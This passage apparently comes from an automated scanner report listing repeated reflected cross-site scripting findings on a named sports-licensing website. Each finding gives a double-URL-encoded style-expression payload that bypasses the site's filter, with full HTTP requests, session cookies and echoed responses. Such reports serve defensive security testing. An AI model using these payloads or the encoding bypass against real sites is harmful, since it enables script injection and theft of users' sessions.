<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175370&7860b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb84182b6d5=1&7860b'style='x:expression(alert(1))'bb84182b6d5=1&7860b%27style%3d%27x%3aexpression%28alert%281%29%29%27bb84182b6d5=1&fromsla=T'>
...[SNIP]...

2.203. http://www.turnerlicensing.com/teams_by_state/Louisiana [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Louisiana

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e214f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278a4ef989e82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e214f'style='x:expression(alert(1))'8a4ef989e82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Louisiana?e214f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278a4ef989e82=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:22 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:20 GMT
NS_RTIMER_COMPOSITE: 1558099633:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=448
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110610


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Louisiana</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>

...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175371&e214f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278a4ef989e82=1&e214f'style='x:expression(alert(1))'8a4ef989e82=1&fromsla=T&e214f%27style%3d%27x%3aexpression%28alert%281%29%29%278a4ef989e82=1'>
...[SNIP]...

2.204. http://www.turnerlicensing.com/teams_by_state/Maryland [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Maryland

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload baba6%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252786c1a467bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as baba6'style='x:expression(alert(1))'86c1a467bc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Maryland?baba6%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252786c1a467bc1=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:22 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: 334652572:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=971
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 107493


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Maryland</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175374&baba6%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252786c1a467bc1=1&baba6'style='x:expression(alert(1))'86c1a467bc1=1&fromsla=T&baba6%27style%3d%27x%3aexpression%28alert%281%29%29%2786c1a467bc1=1'>
...[SNIP]...

2.205. http://www.turnerlicensing.com/teams_by_state/Massachusetts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Massachusetts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 24d7e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527473118b635c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 24d7e'style='x:expression(alert(1))'473118b635c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Massachusetts?24d7e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527473118b635c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:26 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: -811333024:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=952
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110989


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Massachusetts</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scri
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175375&24d7e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527473118b635c=1&24d7e'style='x:expression(alert(1))'473118b635c=1&fromsla=T&24d7e%27style%3d%27x%3aexpression%28alert%281%29%29%27473118b635c=1'>
...[SNIP]...

2.206. http://www.turnerlicensing.com/teams_by_state/Michigan [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Michigan

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4c53%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cbce184105d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c4c53'style='x:expression(alert(1))'cbce184105d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Michigan?c4c53%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cbce184105d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:28 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: 328763124:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111075


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Michigan</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175376&c4c53%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cbce184105d=1&c4c53%27style%3d%27x%3aexpression%28alert%281%29%29%27cbce184105d=1&c4c53'style='x:expression(alert(1))'cbce184105d=1&fromsla=T'>
...[SNIP]...

2.207. http://www.turnerlicensing.com/teams_by_state/Minnesota [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Minnesota

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 84920%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252764dd360bb51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84920'style='x:expression(alert(1))'64dd360bb51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Minnesota?84920%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252764dd360bb51=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:24 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: 226398478:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=867
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110670


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Minnesota</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>

...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175378&84920%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252764dd360bb51=1&84920'style='x:expression(alert(1))'64dd360bb51=1&fromsla=T&84920%27style%3d%27x%3aexpression%28alert%281%29%29%2764dd360bb51=1'>
...[SNIP]...

2.208. http://www.turnerlicensing.com/teams_by_state/Mississippi [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Mississippi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2fff1%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527459cb5a215 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fff1'style='x:expression(alert(1))'459cb5a215 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Mississippi?2fff1%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527459cb5a215=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:23 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: -259178534:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=974
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110299


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Mississippi</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175380&2fff1%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527459cb5a215=1&2fff1'style='x:expression(alert(1))'459cb5a215=1&2fff1%27style%3d%27x%3aexpression%28alert%281%29%29%27459cb5a215=1&fromsla=T'>
...[SNIP]...

2.209. http://www.turnerlicensing.com/teams_by_state/Missouri [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Missouri

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7754c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252727eccdc1792 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7754c'style='x:expression(alert(1))'27eccdc1792 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Missouri?7754c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252727eccdc1792=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:26 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: -1255233885:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=970
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111500


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Missouri</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175381&7754c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252727eccdc1792=1&7754c'style='x:expression(alert(1))'27eccdc1792=1&7754c%27style%3d%27x%3aexpression%28alert%281%29%29%2727eccdc1792=1&fromsla=T'>
...[SNIP]...

2.210. http://www.turnerlicensing.com/teams_by_state/Montana [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Montana

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5bcaf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271afca94aa79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5bcaf'style='x:expression(alert(1))'1afca94aa79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Montana?5bcaf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271afca94aa79=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:31 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 1666357285:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=995
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110208


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Montana</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
nsing.com/s.nl?sc=77&category=175383&5bcaf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271afca94aa79=1&5bcaf%27style%3d%27x%3aexpression%28alert%281%29%29%271afca94aa79=1&fromsla=T&5bcaf'style='x:expression(alert(1))'1afca94aa79=1'>
...[SNIP]...

2.211. http://www.turnerlicensing.com/teams_by_state/Montreal [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Montreal

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7c04c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d59743044a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c04c'style='x:expression(alert(1))'d59743044a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Montreal?7c04c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d59743044a1=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:19 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:18 GMT
NS_RTIMER_COMPOSITE: 1114198378:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=950
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 87630


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Montreal</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=260175&7c04c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d59743044a1=1&7c04c'style='x:expression(alert(1))'d59743044a1=1&7c04c%27style%3d%27x%3aexpression%28alert%281%29%29%27d59743044a1=1&fromsla=T'>
...[SNIP]...

2.212. http://www.turnerlicensing.com/teams_by_state/Nebraska [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Nebraska

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6e07a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527040901e41e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e07a'style='x:expression(alert(1))'040901e41e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Nebraska?6e07a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527040901e41e8=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:28 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
